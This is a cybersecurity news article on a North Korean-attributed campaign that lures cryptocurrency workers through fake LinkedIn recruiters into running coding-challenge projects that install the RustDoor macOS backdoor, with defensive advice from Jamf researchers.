Cybersecurity researchers have warned about a new threat from North Korean-backed hackers targeting LinkedIn users to deliver malware called RustDoor. The latest advisory comes from Jamf Threat Labs, which detected an attack attempt where a user was contacted on the professional social network by claiming to be a recruiter for a legitimate cryptocurrency exchange.
The malicious activity is part of a multi-pronged campaign aimed at infiltrating networks under the pretext of conducting interviews or coding assignments. The financial and cryptocurrency sectors are among the top targets, with state-sponsored adversaries seeking to generate illicit revenues and meet evolving objectives based on the regime’s interests.
The attacks manifest as highly tailored social engineering campaigns aimed at employees of decentralized finance (DeFi) and cryptocurrency businesses. One notable indicator is requests to execute code or download applications on company-owned devices, while another aspect involves requests for pre-employment tests or debugging exercises that involve executing unknown Node.js packages or scripts.
Jamf detected an attack chain where a victim was tricked into downloading a Visual Studio project as part of a coding challenge, which embedded bash commands to download two payloads: RustDoor (also known as Thiefbucket) and zsh_ env. The malware is designed to persist via cron jobs on macOS devices.
RustDoor is a previously documented backdoor for macOS, first seen in February 2024 targeting cryptocurrency firms. A Golang variant dubbed GateDoor was also discovered for Windows machines.
The findings from Jamf are significant as they mark the first time RustDoor has been formally attributed to North Korean threat actors and highlights the use of Objective-C programming language. The tactics and techniques used in the campaign align closely with other cyber activity coming from the DPRK over the past couple of years.
VisualStudioHelper, another payload, is designed to act as an information stealer by harvesting files specified in the configuration. Both payloads operate as a backdoor, using different servers for command-and-control (C2) communications.
The researchers emphasized the importance of training employees, including developers, to be cautious when receiving requests from unknown sources on social media and not running software without thorough verification.
Source: https://thehackernews.com/2024/09/north-korean-hackers-target.html?m=1